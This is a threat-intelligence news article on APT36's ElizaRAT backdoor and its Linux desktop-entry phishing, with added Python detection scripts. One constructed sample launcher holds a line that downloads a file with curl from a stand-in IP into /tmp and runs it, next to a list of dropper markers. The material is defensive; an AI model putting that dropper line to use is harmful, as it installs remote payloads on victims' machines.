APT36 Employing Customized Malware to Attack Indian Government Linux and Windows Servers

APT36 is a highly sophisticated APT (Advanced Persistent Threat) group that is known for conducting targeted espionage in South Asia and is strongly linked to Pakistan.

The group is known for targeting the following Indian sectors:-

  • Government
  • Defense
  • Education

Active since 2013, the group conducts its cyberespionage with the following resources:-

  • Custom-built remote administration tools targeting Windows
  • Lightweight Python-compiled cyber espionage tools serving specific purposes targeting Windows and Linux
  • Weaponized open-source C2 frameworks like Mythic
  • Trojanized installers of Indian government applications like KAVACH multi-factor authentication
  • Trojanized Android apps
  • Credential phishing sites targeting Indian government officials

Zscaler analysts dubbed the Windows backdoor used by APT36 ‘ElizaRAT,’ because of unique strings in observed C2 commands.

APT36 Employing Customized Malware

ElizaRAT is delivered as a .NET binary inside a password-protected archive hosted on Google Drive. The binary is built as a Control Panel applet: its exported CplApplet() entry point calls Main(), which hands off to MainAsync(), where the malicious operations take place.


Each infected machine is given a unique identifier built from the host’s processor ID and system UUID and stored with a ‘.cookie’ extension; this value serves as both the bot’s UUID and its username in C2 communications.

UUID and username (Source – Zscaler)

The backdoor supports the following C2 commands:-

  • /dir
  • /upload
  • /getprocess
  • /run
  • /delete
  • /end
  • /online
  • /identity
  • /ping
  • /scr
  • /createdir

For persistence, the bot drops a Windows shortcut (LNK) in the Startup directory. The shortcut is disguised as a ‘Text Editing APP for Windows’ and launches the Control Panel applet through rundll32.
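To see what this persistence artifact looks like on disk, here is an added Python example (not code from Zscaler or the article) that parses the documented MS-SHLLINK layout far enough to read a shortcut’s relative path and command-line arguments, then flags any Startup-folder LNK that launches rundll32 against a .cpl. The two sample shortcuts, the path C:\Users\Public\editor.cpl and the `shell32.dll,Control_RunDLL` invocation are constructed assumptions for the demo, not indicators from the report.

```python
"""Scan Startup-folder shortcuts (.lnk) for rundll32-launched Control Panel applets.

Added example, not Zscaler's or the article's code. Parses the MS-SHLLINK
header and StringData section; the sample shortcuts are constructed here.
"""
import struct
import tempfile
from pathlib import Path

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
# LinkFlags bits (MS-SHLLINK section 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link as a dict (missing fields are "")."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE \
            or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip IDList: u16 size + items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # skip LinkInfo: u32 total size
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, name in STRING_FIELDS:             # fixed order per spec section 2.4
        if not flags & flag:
            fields[name] = ""
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return fields


def is_cpl_via_rundll32(fields: dict) -> bool:
    """True when the shortcut's command line runs rundll32 against a .cpl.
    A production triage tool should also resolve the target from LinkInfo/IDList,
    since the launcher may sit there rather than in RELATIVE_PATH."""
    cmd = f"{fields['relative_path']} {fields['arguments']}".lower()
    return "rundll32" in cmd and ".cpl" in cmd


def scan_startup(directory: Path) -> list:
    """Return one dict per suspicious .lnk in `directory` (e.g. a user's Startup folder)."""
    hits = []
    for lnk in sorted(directory.glob("*.lnk")):
        try:
            fields = parse_lnk(lnk.read_bytes())
        except ValueError:
            continue
        if is_cpl_via_rundll32(fields):
            hits.append({"file": lnk.name, **fields})
    return hits


def build_lnk(name: str, relative_path: str, arguments: str) -> bytes:
    """Constructed test shortcut: header + unicode StringData only (no IDList, no LinkInfo)."""
    flags = HAS_NAME | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)  # attrs, 3 timestamps, size, icon, SW_SHOWNORMAL, hotkey, reserved
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (name, relative_path, arguments))
    return header + body


# Constructed samples. The applet path and Control_RunDLL arguments are assumptions for the demo.
SAMPLE_MALICIOUS = build_lnk("Text Editing APP for Windows",
                             r"..\..\..\..\Windows\System32\rundll32.exe",
                             r"shell32.dll,Control_RunDLL C:\Users\Public\editor.cpl")
SAMPLE_BENIGN = build_lnk("Notepad", r"..\..\..\..\Windows\System32\notepad.exe", "")


def demo() -> list:
    """Write both samples into a temporary 'Startup' folder and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        folder = Path(tmp)
        (folder / "Text Editing APP.lnk").write_bytes(SAMPLE_MALICIOUS)
        (folder / "Notepad.lnk").write_bytes(SAMPLE_BENIGN)
        return scan_startup(folder)


if __name__ == "__main__":
    for hit in demo():
        print(f"{hit['file']}: {hit['relative_path']} {hit['arguments']}")
```

On a live host, point scan_startup() at the per-user Startup folder (%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup) and the all-users one under %PROGRAMDATA%; the rundll32 + .cpl combination in a Startup shortcut is rare enough in normal environments to be worth a ticket on its own.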

The Program class’s dosome() method displays a decoy PDF extracted from the .NET binary’s resources; the decoy is designed to make the user believe an error occurred while opening the file.

Fake error (Source – Zscaler)

APT36’s use of Linux desktop entry files is a first for the group: three samples, all undetected at the time of analysis, have been observed since May 2023, used in a phishing scheme against the Indian government.

The Linux payload, which targets both native Linux hosts and Windows Subsystem for Linux (WSL) machines, lacks a complete C2 mechanism, which suggests it is an early test build still under development.
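To make the technique concrete, here is an added Python example (not code from Zscaler or the article) showing how a desktop entry is parsed and what a defender can check for: the launcher runs a shell or script interpreter, its Exec= line pulls something from the network or executes from /tmp, or it is named and iconed like a document while being Type=Application. The two entries, the Meeting_Minutes.pdf lure and the 203.0.113.7 URL are constructed for the demo and are not indicators from the report.

```python
"""Flag Linux .desktop launchers that behave like phishing droppers.

Added example, not code from Zscaler or the article. A desktop entry is an
INI-style file; opening one from a file manager runs whatever Exec= says, so
a launcher named like a PDF can fetch and run a payload while opening a decoy.
The two entries and the 203.0.113.7 URL below are constructed for the demo.
"""
import configparser
import re
import tempfile
from pathlib import Path

INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python2", "python3", "perl"}
DROPPER_MARKERS = ("curl ", "wget ", "chmod +x", "base64 -d", "/tmp/", "/dev/shm", "| sh", "| bash")
LURE_PATTERN = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)$|application-pdf|x-office", re.IGNORECASE)
# User-writable places launchers live; pass these (expanded) to scan_desktop_files on a real host.
COMMON_LOCATIONS = ("~/Desktop", "~/Downloads", "~/.local/share/applications", "~/.config/autostart")


def parse_desktop_entry(text: str) -> dict:
    """Return the [Desktop Entry] group as a dict; keys stay case-sensitive as the spec requires."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        raise ValueError("no [Desktop Entry] group")
    return dict(cp["Desktop Entry"])


def suspicious_reasons(entry: dict) -> list:
    """Return the reasons this launcher looks like a dropper (empty list = nothing found)."""
    reasons = []
    exec_line = entry.get("Exec", "")
    tokens = exec_line.split()
    if tokens and Path(tokens[0]).name == "env" and len(tokens) > 1:
        tokens = tokens[1:]                      # handle `/usr/bin/env python3 ...`
    if tokens and Path(tokens[0]).name in INTERPRETERS:
        reasons.append("exec-via-interpreter")
    if any(marker in exec_line for marker in DROPPER_MARKERS):
        reasons.append("download-or-temp-exec")
    looks_like_document = LURE_PATTERN.search(entry.get("Name", "")) or \
        LURE_PATTERN.search(entry.get("Icon", ""))
    if entry.get("Type", "") == "Application" and looks_like_document:
        reasons.append("document-lure")
    return reasons


def scan_desktop_files(directory: Path) -> list:
    """Return (filename, reasons) for every flagged .desktop file in `directory`."""
    hits = []
    for path in sorted(directory.glob("*.desktop")):
        try:
            entry = parse_desktop_entry(path.read_text(errors="replace"))
        except (ValueError, configparser.Error):
            continue
        reasons = suspicious_reasons(entry)
        if reasons:
            hits.append((path.name, reasons))
    return hits


# Constructed samples: a dropper-style lure and an ordinary application launcher.
SAMPLE_DROPPER = """[Desktop Entry]
Type=Application
Name=Meeting_Minutes.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s http://203.0.113.7/update -o /tmp/.u && chmod +x /tmp/.u && /tmp/.u & xdg-open /tmp/Meeting_Minutes.pdf"
"""
SAMPLE_BENIGN = """[Desktop Entry]
Type=Application
Name=Firefox
Icon=firefox
Terminal=false
Exec=firefox %u
"""


def demo() -> list:
    """Write both samples into a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        folder = Path(tmp)
        (folder / "Meeting_Minutes.pdf.desktop").write_text(SAMPLE_DROPPER)
        (folder / "firefox.desktop").write_text(SAMPLE_BENIGN)
        return scan_desktop_files(folder)


if __name__ == "__main__":
    for name, reasons in demo():
        print(f"{name}: {', '.join(reasons)}")
```

On a real host run scan_desktop_files(Path(p).expanduser()) for each entry in COMMON_LOCATIONS; inside a WSL distribution the same home-directory paths apply. The "document-lure" check alone produces false positives for legitimate document viewers, so treat it as a score component, not a verdict.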

Content inside the decoy PDF file (Source – Zscaler)

The PDF mimics an Indian Defence Ministry document detailing a Saudi delegation’s discussion with Indian military medics.

Python-Based Cyber Espionage Utilities

APT36 also uses Python-compiled espionage utilities, including ELF binaries for Linux, against Indian government targets on both Windows and Linux. The newly identified utilities are:-

  • GLOBSHELL
  • PYSHELLFOX

Because ElizaRAT was distributed through Google Drive links, researchers were also able to retrieve metadata about the Drive’s owner and the email account linked to it.

IOCs

IOCs (Source – Zscaler)


Tushar is a cyber security content editor with a passion for creating captivating and informative content. With years of experience in cyber security, he covers cyber security news, technology and other news.